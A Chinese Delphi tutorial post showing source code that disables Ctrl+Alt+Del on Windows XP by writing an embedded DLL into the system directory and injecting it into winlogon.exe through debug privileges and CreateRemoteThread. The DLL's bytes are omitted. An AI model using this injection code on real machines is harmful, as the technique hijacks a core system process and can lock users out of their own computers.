RSS订阅 | 匿名投稿
您的位置:网站首页 > 键盘 > 正文

delphi Windows XP下屏蔽Ctrl_Alt_Del键的方法

作者:admin 来源:未知 日期:2010/4/24 10:49:54 人气: 标签:

//调用下面两个函数就可以了
procedure RunFuckCAD; //屏蔽Ctrl+Alt+Del
procedure StopFuckCAD; //取消屏蔽Ctrl+Alt+Del
点击下载源文件
主要代码为:

view plaincopy to clipboardprint?
unit Fuck_CAD_Unit;

interface

uses Windows, TLHelp32,SysUtils;

const
MyKernel='SnowmanLockScreenHook.Dll'; //释放完得文件名,可以自己改
Winlogon='winlogon.exe';
MyKernelSize=9216;
MyKernelBuf:Array [0..9215] of Byte =
(
//... 数组内容太多,略,见源文件
);

procedure RunFuckCAD;
procedure StopFuckCAD;


implementation


procedure GetDebugPrivs; //提升到Debug权限
var
hToken: THandle;
tkp: TTokenPrivileges;
retval: dword;
begin
If (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken)) then
begin
LookupPrivilegeValue(nil, 'SeDebugPrivilege' , tkp.Privileges[0].Luid);
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
end;
end;

function NameToPID(ExeName:pchar):longword;
//通过进程文件名返回一个Pid,如果多个同名进程返回第一个进程的Pid
var
hSnap:longword;
ProcessEntry: TProcessEntry32;
c:boolean;
begin
result:=0;
hSnap:= CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
ProcessEntry.dwSize:= Sizeof(TProcessEntry32);
c:= Process32First(hSnap,ProcessEntry);
While c do
begin
if LstrcmpiA(ExeName,ProcessEntry.szExeFile)= 0 then
begin
result:=ProcessEntry.th32ProcessID;
break;
end;
c:=Process32Next(hSnap,ProcessEntry);
end;
CloseHandle(hSnap);
end;

function GetSysPath:pchar; //最后没加'/'
var
a:pchar;
begin
GetMem(a,255);
GetSystemDirectory(a,255);
Result:=a;
end;


procedure DelKernel;
begin
DeleteFile(pchar(string(GetSysPath)+'/'+string(MyKernel))) ;
end;

function CreateKernelFile(SaveFile:String):Boolean;
var
hFile:THandle;
BytesWrite: dword;
begin
Result:=False;
hFile := CreateFile(Pchar(SaveFile),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ,nil,CREATE_ALWAYS,0,0);
if hFile = INVALID_HANDLE_VALUE then Exit;
if WriteFile(hFile,MyKernelBuf,MyKernelSize, BytesWrite, nil) then Result:=True;
CloseHandle(hFile);
end;

Function GetModule(ProcessName,ModuleName:Pchar):longword;
//This is a function written by Hke.
//检查进程是否加载DLL,是返回指针,否返回0
var
PID:longword;
hModuleSnap:longword;
ModuleEntry: TModuleEntry32;
begin
Pid:=NameToPID(ProcessName);
GetDebugPrivs;
hModuleSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,Pid);
ModuleEntry.dwSize:=SizeOf(TModuleEntry32);
result:=0;
if Module32First(hModuleSnap,ModuleEntry) then
if (LstrcmpiA(ModuleEntry.szModule,ModuleName)=0) then
Result:=ModuleEntry.hModule
else
begin
while Module32Next(hModuleSnap,ModuleEntry) do
begin
if LstrcmpiA(ModuleEntry.szModule,ModuleName)=0 then
begin
Result:=ModuleEntry.hModule;
break;
end;
end;
end;
CloseHandle(hModuleSnap);
end;

procedure InjectKernelModule(ProcessName ,DllName: Pchar);
//This is a function written by Hke.
//利用远程线程讲把Dll注入进程
var
tmp:longword;//这个专门来占格式收集垃圾
Mysize:longword;//放字符串长度
Parameter:pointer;//放那个参数的指针(位置在目标进程内)
hThread:longword;
MyHandle,PID:longword;
Tkernel:pchar;//为了取得指针
begin
if GetModule(ProcessName , DllName)=0 then //如果已经注入就不重复了
begin
Tkernel:= DllName;
Pid:=NameToPID(ProcessName);
GetDebugPrivs;
Myhandle:=OpenProcess(PROCESS_ALL_ACCESS, False, Pid);
Mysize:=strlen(MyKernel)+1;
Parameter:= VirtualAllocEx(Myhandle, nil, Mysize, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(Myhandle, Parameter, Pointer(Tkernel), MySize, tmp);
hThread:= CreateRemoteThread(Myhandle,nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameter, 0 , tmp);
if hThread <> 0 then
begin
WaitForSingleObject(hThread, INFINITE); //等待线程运行完
CloseHandle(hThread);
end;
VirtualFreeEx(MyHandle, Parameter, 0, MEM_RELEASE); //把用完的内存释放掉
CloseHandle(MyHandle);
end;
end;

procedure UnInjectKernelModule(ProcessName ,DllName: Pchar);
//This is a function written by Hke.
//从目标进程卸载一个DLL
var
tmp:longword;//这个专门来占格式收集垃圾
hThread:longword;
MyHandle,PID:longword;
ModuleEntry:longword;
begin
Pid:=NameToPID(ProcessName);
GetDebugPrivs;
Myhandle:=OpenProcess(PROCESS_ALL_ACCESS, False, Pid);
ModuleEntry:=GetModule(ProcessName ,DllName);
if ModuleEntry<>0 then //没加载就不卸载了
begin
hThread:= CreateRemoteThread(Myhandle,nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'FreeLibrary'), pointer(ModuleEntry), 0 , tmp);
WaitForSingleObject(hThread, INFINITE); //等待线程运行完
CloseHandle(hThread);
end;
CloseHandle(MyHandle);
end;

procedure RunFuckCAD; //导出函数调用后屏蔽Ctrl+Alt+Del
begin
CreateKernelFile(string(GetSysPath)+'/'+string(MyKernel));
//释放DLL到系统目录
InjectKernelModule(Winlogon ,MyKernel);
//把释放完DLL注入Winlogon进程
end;

procedure StopFuckCAD; //导出函数取消屏蔽Ctrl+Alt+Del
begin
UnInjectKernelModule(Winlogon ,MyKernel);
//从Winlogon卸载DLL
DelKernel;
//把Dll从系统目录删除
end;

end.

读完这篇文章后,您心情如何?
0
0
0
0
0
0
0
0
本文网址: